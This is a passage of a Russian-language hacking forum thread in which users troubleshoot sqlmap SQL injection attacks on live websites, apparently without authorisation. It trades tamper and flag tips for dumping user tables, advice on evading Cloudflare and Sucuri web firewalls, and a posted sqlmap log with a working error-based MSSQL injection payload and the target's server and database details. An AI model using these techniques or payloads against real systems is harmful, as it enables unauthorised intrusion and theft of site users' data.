HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #751  
Старый 14.09.2018, 14:10
msk_smail
Познающий
Регистрация: 09.03.2016
Сообщений: 30
Провел на форуме:
10377

Репутация: 0
По умолчанию

всем привет , возникла ситуация, что таблицы в БД имеют имя #__users , например. При получении колонок или дампе выскакивает, что нет записей в таблице, но такое не может быть , так как на сайте очень много пользователей. Помогите, пожалуйста, это обойти. Инкапсуляция не помогает
 
Ответить с цитированием

  #752  
Старый 14.09.2018, 14:59
msk_smail
Познающий
Регистрация: 09.03.2016
Сообщений: 30
Провел на форуме:
10377

Репутация: 0
По умолчанию

Цитата:
Сообщение от man474019  

try with --hex or --no-cast parameter and play with different tamper scripts
помог отдельно взятый тампер unionalltounion и --hex, причем в связке с другими тамперами он не срабатывал, только как отдельный, список таблиц сразу преобразился, спасибо
 
Ответить с цитированием

  #753  
Старый 19.09.2018, 13:07
Ntine25
Новичок
Регистрация: 19.09.2018
Сообщений: 3
Провел на форуме:
651

Репутация: 0
По умолчанию

Как обойти cloudflare?
 
Ответить с цитированием

  #754  
Старый 22.09.2018, 18:54
panic.ker
Познающий
Регистрация: 25.08.2013
Сообщений: 92
Провел на форуме:
35643

Репутация: 3
По умолчанию

Цитата:
Сообщение от Ntine25  

Как обойти cloudflare?
Найти реальный ip.

Для начала ознакомься

/threads/458593/

Вопрос не в той теме. Средствами самого sqlmap'a ты не обойдешь, только подставляя валидную сессию и запрос (на которых клауд пропустил при пентесте). Но при долгой работе над сайтом - так себе затея.
 
Ответить с цитированием

  #755  
Старый 22.09.2018, 20:01
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от Ntine25  

Как обойти cloudflare?
Цитата:
Сообщение от panic.ker  

Найти реальный ip.
Для начала ознакомься
/threads/458593/
Вопрос не в той теме. Средствами самого sqlmap'a ты не обойдешь, только подставляя валидную сессию и запрос (на которых клауд пропустил при пентесте). Но при долгой работе над сайтом - так себе затея.
Можно ещё попробовать нетспаркером

У него есть консоль при раскрутки SQL

Я не пробовал но при скане клауд обходится
 
Ответить с цитированием

  #756  
Старый 22.09.2018, 20:17
panic.ker
Познающий
Регистрация: 25.08.2013
Сообщений: 92
Провел на форуме:
35643

Репутация: 3
По умолчанию

Цитата:
Сообщение от Sensoft  

Можно ещё попробовать нетспаркером
У него есть консоль при раскрутки SQL
Я не пробовал но при скане клауд обходится
НЕ обходится. Просто пропускает, т.к. нетспаркер пропустил, "консоль" использует ту же сессию, куки, заголовки, токены etc которые использовались при скане. При смене любых параметров, которые не пропустит сам клауд, повторном скане и т.д. он вылезет снова. Инструмент в данном случае не важен. Можно просто сохранить в файл запрос и вызвать в мапе через опцию -r /path/to/file

К слову, good news, everyone! (последние сводочки)

CloudFlare отключила CAPTCHA для пользователей Tor. В качестве альтернативы предложено бесплатное решение CloudFlare Onion Service.
 
Ответить с цитированием

  #757  
Старый 30.09.2018, 14:06
qwerty1qwerty
Новичок
Регистрация: 09.06.2018
Сообщений: 11
Провел на форуме:
2069

Репутация: 0
По умолчанию

Всем привет. Нашел иньекцию. Спарсил бд на ура,но неможет найти таблицы,--hex и --no-cast не помогают.Тамперы некоторые тоже. В чем может быть проблема? и что можно сделать?
[*] starting at 13:52:51

[13:52:52] [INFO] resuming back-end DBMS 'microsoft sql server'

[13:52:52] [INFO] testing connection to the target URL

[13:52:54] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection

[13:53:00] [WARNING] WAF/IPS/IDS product hasn't been identified

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: Sponsor (POST)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

(IN)

Payload: PlacementID=&Sponsor=DFGHJK'+(SELECT 'hwlL' WHERE 5397=5397 AND 8

871 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE W

HEN (8871=8871) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+

CHAR(106)+CHAR(113))))+'

---

[13:53:00] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 8.1 or 2012 R2

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5

back-end DBMS: Microsoft SQL Server 2012

[13:53:00] [INFO] fetching tables for database: db_superdb

[13:53:23] [WARNING] the SQL query provided does not return any output

[13:53:23] [WARNING] in case of continuous data retrieval problems you are advis

ed to try a switch '--no-cast' or switch '--hex'

[13:53:24] [WARNING] the SQL query provided does not return any output

[13:53:24] [CRITICAL] unable to retrieve the tables for any database

[13:53:24] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 2 times, 404 (Not Found) - 1 times
[*] shutting down at 13:53:24

C:\sqlmap>
 
Ответить с цитированием

  #758  
Старый 02.10.2018, 19:56
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от qwerty1qwerty  

Всем привет. Нашел иньекцию. Спарсил бд на ура,но неможет найти таблицы,--hex и --no-cast не помогают.Тамперы некоторые тоже. В чем может быть проблема? и что можно сделать?[*] starting at 13:52:51
[13:52:52] [INFO] resuming back-end DBMS 'microsoft sql server'
[13:52:52] [INFO] testing connection to the target URL
[13:52:54] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[13:53:00] [WARNING] WAF/IPS/IDS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Sponsor (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
(IN)
Payload: PlacementID=&Sponsor=DFGHJK'+(SELECT 'hwlL' WHERE 5397=5397 AND 8
871 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE W
HEN (8871=8871) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+
CHAR(106)+CHAR(113))))+'
---
[13:53:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[13:53:00] [INFO] fetching tables for database: db_superdb
[13:53:23] [WARNING] the SQL query provided does not return any output
[13:53:23] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:53:24] [WARNING] the SQL query provided does not return any output
[13:53:24] [CRITICAL] unable to retrieve the tables for any database
[13:53:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times, 404 (Not Found) - 1 times[*] shutting down at 13:53:24
C:\sqlmap>
Такая же ***ня

Тоже MsSQL
 
Ответить с цитированием

  #759  
Старый 03.10.2018, 21:32
vasyaz
Новичок
Регистрация: 29.10.2012
Сообщений: 12
Провел на форуме:
3176

Репутация: 0
По умолчанию

Parameter: GET

Type: boolean-based blind

Таблицы и колонки выходят нормально.

Когда делаю дамп выходит такое

[09:08:55] [INFO] retrieved:

[09:08:57] [INFO] resumed: ?????????????????????

[09:08:59] [INFO] retrieving the length of query output

[09:09:01] [INFO] retrieved:

[09:09:02] [INFO] resumed: ?????????????????????

Нашел, что надо задать кодировку вывода.

Как правильно написать запрос?
 
Ответить с цитированием

  #760  
Старый 04.10.2018, 00:04
zifus
Познающий
Регистрация: 15.08.2015
Сообщений: 83
Провел на форуме:
17650

Репутация: 0
По умолчанию

Подскажите есть ли возможность обойти waf от sucuri.

все способы с гугла опробовал..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.